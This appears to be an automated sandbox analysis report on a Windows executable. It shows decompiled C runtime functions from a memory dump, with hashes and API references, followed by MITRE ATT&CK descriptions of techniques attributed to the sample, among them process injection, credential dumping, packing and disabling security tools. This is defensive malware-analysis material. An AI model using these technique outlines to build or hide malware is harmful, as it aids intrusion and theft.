Source File: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9

Uniqueness

Uniqueness Score: -1.00%

Function 00408223, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0xd3ed1eb0
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}

0x0040822b
0x00408232
0x00408235
0x0040823d
0x00408241
0x0040824d
0x00408250
0x00408253
0x0040825a
0x00408262
0x00408265
0x0040826b
0x00408271
0x00408276
0x00408278
0x0040827b
0x00408280
0x0040828a
0x00408291
0x00408294
0x0040829b
0x004082a2
0x004082ce
0x004082f4
0x004082f6
0x00000000
0x004082d0
0x004082d3
0x0040839a
0x004083a6
0x004083b1
0x004083b6
0x004082d9
0x004082e0
0x004082e5
0x004082eb
0x004082f1
0x00000000
0x004082f1
0x004082eb
0x004082d3
0x004082a4
0x004082a8
0x004082ab
0x004082b1
0x004082b3
0x004082b6
0x004082ba
0x004082f7
0x004082fa
0x004082fb
0x00408300
0x00408306
0x0040830c
0x0040831b
0x00408321
0x00408327
0x0040832c
0x00408348
0x004083bb
0x004083c1
0x0040834a
0x00408352
0x0040835b
0x00408361
0x00000000
0x00408363
0x00408365
0x00408368
0x00408381
0x00000000
0x00408383
0x00408387
0x00408389
0x0040838c
0x00000000
0x0040838c
0x00408387
0x00408381
0x00408361
0x0040835b
0x00408348
0x0040832c
0x00408306
0x00000000
0x0040838f
0x0040838f
0x004083c3
0x004083cd
0x004083d5

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
__fassign.LIBCMT ref: 004082E0
__fassign.LIBCMT ref: 004082FB
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379

Memory Dump Source

Source File: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0xd3ed1eb0
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}

0x00403639
0x00403640
0x00403643
0x00403647
0x00403652
0x0040365a
0x00403665
0x0040366b
0x0040366f
0x00403676
0x0040367c
0x0040367c
0x0040367e
0x00403683
0x00403688
0x00403688
0x00403693
0x0040369b

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688

Strings

mscoree.dll, xrefs: 0040364B
CorExitProcess, xrefs: 0040365D

Memory Dump Source

Source File: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98

Uniqueness

Uniqueness Score: -1.00%

Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0xd3ed1eb0
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}

0x004062c0
0x004062c7
0x004062ca
0x004062d3
0x004062d8
0x004062dd
0x004062e2
0x004062e5
0x004062e7
0x004062e7
0x004062ec
0x00406305
0x0040630b
0x00406310
0x004063af
0x004063b3
0x004063b8
0x004063b8
0x004063cc
0x004063d4
0x004063d4
0x00406316
0x00406319
0x0040631e
0x00406322
0x0040636e
0x00406370
0x00406372
0x00406377
0x0040638e
0x00406396
0x004063a6
0x004063a6
0x00406396
0x004063a8
0x004063a9
0x00000000
0x004063ae
0x00406324
0x00406329
0x0040632b
0x0040632d
0x0040632d
0x00406335
0x00406352
0x0040635c
0x00406361
0x00000000
0x00000000
0x00406363
0x00406369
0x00406369
0x00000000
0x00406369
0x00406339
0x0040633d
0x00406342
0x00406346
0x00000000
0x00000000
0x00406348
0x00000000

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
__alloca_probe_16.LIBCMT ref: 0040633D
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
__freea.LIBCMT ref: 004063A9

Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

Memory Dump Source

Source File: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xd3ed1eb1
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x00405756
0x0040575a
0x00405761
0x00405765
0x00405773
0x00405789
0x0040578d
0x004057b6
0x004057b8
0x004057bc
0x004057bf
0x004057bf
0x004057c5
0x004057c7
0x00000000
0x004057c8
0x0040578f
0x00405798
0x004057a7
0x0040579a
0x0040579d
0x004057a3
0x004057a3
0x004057ab
0x00000000
0x004057ad
0x004057b0
0x004057b2
0x00000000
0x004057b2
0x004057ab
0x00405767
0x0040576c
0x00000000

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D

Memory Dump Source

Source File: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8

Uniqueness

Uniqueness Score: -1.00%

Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0x7
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0x7
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x00404320
0x00404320
0x00404320
0x0040432a
0x0040432c
0x00404331
0x00404334
0x00404342
0x00404349
0x0040434e
0x00404351
0x00404354
0x00404366
0x0040436b
0x0040436d
0x00404378
0x0040437f
0x00404384
0x00404387
0x00404389
0x00000000
0x00000000
0x00000000
0x00000000
0x0040436f
0x0040436f
0x00000000
0x0040436f
0x00404356
0x00404356
0x00404357
0x00404357
0x0040435c
0x00404397
0x00404398
0x0040439e
0x004043a3
0x004043a6
0x004043a7
0x004043a8
0x004043af
0x004043b1
0x004043b3
0x004043b8
0x004043bb
0x004043c9
0x004043d5
0x004043d8
0x004043db
0x004043ed
0x004043f2
0x004043f4
0x004043ff
0x00404405
0x0040440d
0x0040440f
0x00000000
0x00000000
0x00000000
0x00000000
0x004043f6
0x004043f6
0x00000000
0x004043f6
0x004043dd
0x004043dd
0x004043de
0x004043de
0x00404411
0x00404412
0x00404412
0x004043bd
0x004043c3
0x004043c7
0x0040441a
0x0040441b
0x00404421
0x00000000
0x00000000
0x00000000
0x004043c7
0x00404428
0x00404428
0x00404336
0x0040433c
0x00404340
0x0040438b
0x0040438c
0x00404396
0x00000000
0x00000000
0x00000000
0x00404340

APIs

GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
_abort.LIBCMT ref: 0040439E

Memory Dump Source

Source File: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$_abort
String ID:
API String ID: 88804580-0
Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D

Uniqueness

Uniqueness Score: -1.00%

Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x004025ba
0x004025bf
0x004025cb
0x004025d0
0x004025d5
0x004025d7
0x004025e2
0x004025d9
0x004025d9
0x00000000
0x004025d9
0x004025cd
0x004025cd
0x004025cf
0x004025cf

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4

Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9

Memory Dump Source

Source File: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E

Uniqueness

Uniqueness Score: -1.00%

Function 00405575, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405575() {

				 *0x412e78 = GetCommandLineA();
				 *0x412e7c = GetCommandLineW();
				return 1;
			}

0x0040557b
0x00405586
0x0040558d

APIs

GetCommandLineA.KERNEL32 ref: 00405575
GetCommandLineW.KERNEL32 ref: 00405580

Strings

h3v, xrefs: 0040557B

Memory Dump Source

Source File: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CommandLine
String ID: h3v
API String ID: 3253501508-4102615731
Opcode ID: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
Instruction ID: 265b5206e6e9c5440433cfe38bbdb56a7b23962a2c49d0f47ff6119da82ef27c
Opcode Fuzzy Hash: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
Instruction Fuzzy Hash: 24B09278800300CFD7008FB0BB8C0843BA0B2382023A09175D511D2320D6F40060DF4C

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

